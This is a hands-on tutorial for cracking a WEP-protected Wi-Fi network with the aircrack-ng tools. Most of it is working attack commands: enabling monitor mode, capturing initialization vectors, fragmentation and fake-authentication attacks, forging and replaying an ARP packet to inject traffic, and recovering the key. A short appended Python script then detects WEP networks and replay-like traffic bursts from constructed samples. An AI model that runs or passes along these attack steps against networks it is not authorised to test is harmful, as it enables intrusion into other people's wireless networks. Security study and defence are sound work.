1. Type in "airmon-ng" to see the wireless adapters on your computer.

2. You should see a listing come up. Mine showed wlan0. Yours may be different, such as rausb0.
Type in "airmon-ng start wlan0" to start your wireless device, replacing "wlan0" with whatever yours showed. This will create a new "virtual" device (a monitor-mode interface) and will show its name. The name for mine was "mon0".
3. Open a new terminal window and type "airodump-ng mon0", again replacing "mon0" with the name of your new virtual device.
You will begin to see a listing of different APs (access points). Find the one you want and press Control + C. Pressing Control + C cancels the program currently running in the terminal. The names of the networks found are under the ESSID column. You may not see anything there, which is fine; some of them are hidden. FUSiON is the name of my network, so I went over to the BSSID column and copied the address, which was 00:23:69:18:E4:7D. This address is important, so I would recommend copying it or writing it down. Also take note of which channel it is on.
4. This is what I typed after that: "airodump-ng --bssid 00:23:69:18:E4:7D --channel 6 --ivs -w FUSiON mon0". This is all really easy stuff, so I'll just explain it to you right quick. airodump-ng is the program that captures what are called IVs (initialization vectors), the primary component in cracking WEP networks. Here goes!
o Type "airodump-ng".
o Add a space and type "--bssid 00:23:69:18:E4:7D", replacing the address with the address of your network. This "flag" says we only want to see this address and nothing else.
o Add a space and type "--channel 6", replacing the number 6 with the number of the channel of your network (although 6 is VERY common, so don't be surprised if that is it).
o Add a space and type "--ivs". This option captures only IVs, which will make cracking the password faster.
o Add a space and type "-w FUSiON", replacing FUSiON with the name of your network, or something that you will remember, as we will be cracking this file later to find the password. I just use the name of the network, because it helps me remember more easily.
o The "mon0" at the end simply defines which device to use.
5. Open a new terminal window. In it, type "aireplay-ng -5 -b 00:23:69:18:E4:7D mon0".
o aireplay-ng is a tool that greatly helps generate IVs. Without it, it wouldn't be possible to crack most WEP networks.
o The "-5" flag is one method, and the most common, used to generate the IVs.
o The "-b 00:23:69:18:E4:7D" tells it which address to attack. The -b stands for bssid, which is the address of your network. So you will have to replace 00:23:69:18:E4:7D with the address of your network (the one I recommended you write down or copy earlier).
o The "mon0" at the end, again, just defines which device to use.
6. Wait, and press "Y" for yes when it asks whether you would like to use the selected frame.
7. This process may have to be repeated until you have a resulting fragment file. It will say when you do. Additionally, you can run the command "aireplay-ng -1 1 -a 00:23:69:18:E4:7D mon0" to help with getting a fragment file. Again, make sure to replace my address with your own.
8. Now we must build a file that will be used to gather those precious IVs! I did it with the following command:
"packetforge-ng -0 -a 00:23:69:18:E4:7D -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0324-230256.xor -w arpy"
Let me break this down for you.
o packetforge-ng is the program which will build the arp file, as I like to call it, which you will soon see.
o Add a space and follow it with "-0 -a 00:23:69:18:E4:7D", and of course replace the address with your own network address.
o Add a space and type in "-h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255". This part of the command is pretty universal and is rarely changed, so we won't go into detail on it here.
o Add a space and type in "-y fragment-XXXX-XXXXXX.xor", replacing this one with the name of your own fragment file.
o And lastly, type in "-w arpy". Only the -w is important; the "arpy" can be anything you can remember. It's something I've just always used, because it's easy for me to remember.
o If all goes well, it reports that it successfully built our ARP packet.
9. Almost done! "aireplay-ng -3 -r arpy -b 00:23:69:18:E4:7D mon0" is our next command.
o aireplay-ng, like before, should get those IVs flowing in. On average, I see about 500 IVs/second, which isn't too bad. But some cards do better than others, so you may have better or worse luck.
o -r arpy is a flag that tells aireplay-ng to replay the arp file we created, called arpy.
o Like before, -b 00:23:69:18:E4:7D specifies which address to attack, and mon0 says which wireless interface to use.
10. If all went well, we are gathering IVs! Open the airodump-ng terminal window that we've had open and look at the Data column. It should be constantly rising. This is the longest process, as we have to wait. While others recommend getting at least 100,000 IVs, I've never waited that long. I've cracked many WEPs at just 20,000, although I recommend cracking at 40,000 IVs. So go get a Dr. Pepper and wait a while until you have enough accumulated.
11. Once you have at least 40,000, we can start cracking the WEP password!
o This step has to be the simplest.
o Open a new terminal window and type "aircrack-ng XXXX-01.ivs", replacing the XXXX with the name you used when you first started the airodump-ng command.
o Depending on the speed of your computer, you will soon have the WEP key decrypted. Just make sure to remove the colons ":" before entering the key.
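From the defender's side, the walkthrough above gives two observable signatures: an AP still running WEP at all, and a Data count that jumps from a trickle to hundreds of frames per second once the ARP replay in step 9 starts. The following added example (not part of the original tutorial) runs that check over a few constructed sniffer samples; the row format and BSSIDs are my own, not airodump-ng's output.

```python
"""Flag WEP networks and ARP-replay-like data-frame bursts in sniffer samples.
Added defender-side example; rows are constructed, not real airodump-ng output."""
from collections import defaultdict

# Constructed samples: (seconds since start, BSSID, privacy, cumulative data frames).
# The WEP AP idles at ~1 frame/s, then jumps to ~500 frames/s, the rate the
# tutorial reports once ARP replay injection is running.
SAMPLES = [
    (0,  "02:00:00:00:00:01", "WEP",  120),
    (10, "02:00:00:00:00:01", "WEP",  130),
    (20, "02:00:00:00:00:01", "WEP",  5200),
    (30, "02:00:00:00:00:01", "WEP",  10300),
    (0,  "02:00:00:00:00:02", "WPA2", 400),
    (10, "02:00:00:00:00:02", "WPA2", 600),
    (20, "02:00:00:00:00:02", "WPA2", 800),
]


def frame_rates(samples):
    """Per-BSSID list of (interval_end_seconds, frames_per_second) from cumulative counts."""
    by_bssid = defaultdict(list)
    for t, bssid, _privacy, count in samples:
        by_bssid[bssid].append((t, count))
    rates = {}
    for bssid, points in by_bssid.items():
        points.sort()
        rates[bssid] = [
            (t1, (c1 - c0) / (t1 - t0))
            for (t0, c0), (t1, c1) in zip(points, points[1:])
            if t1 > t0
        ]
    return rates


def find_alerts(samples, burst_fps=100.0):
    """Return (bssid, message) alerts: any WEP AP, plus any data-frame burst."""
    alerts = []
    privacy = {bssid: priv for _, bssid, priv, _ in samples}
    for bssid, priv in privacy.items():
        if priv == "WEP":
            alerts.append((bssid, "WEP in use: IV collection breaks it regardless of key; migrate to WPA2/WPA3"))
    for bssid, rates in frame_rates(samples).items():
        for t, fps in rates:
            if fps >= burst_fps:
                alerts.append((bssid, f"data-frame burst of {fps:.0f}/s ending at t={t}s, consistent with ARP replay injection"))
    return alerts


if __name__ == "__main__":
    for bssid, msg in find_alerts(SAMPLES):
        print(bssid, msg)
```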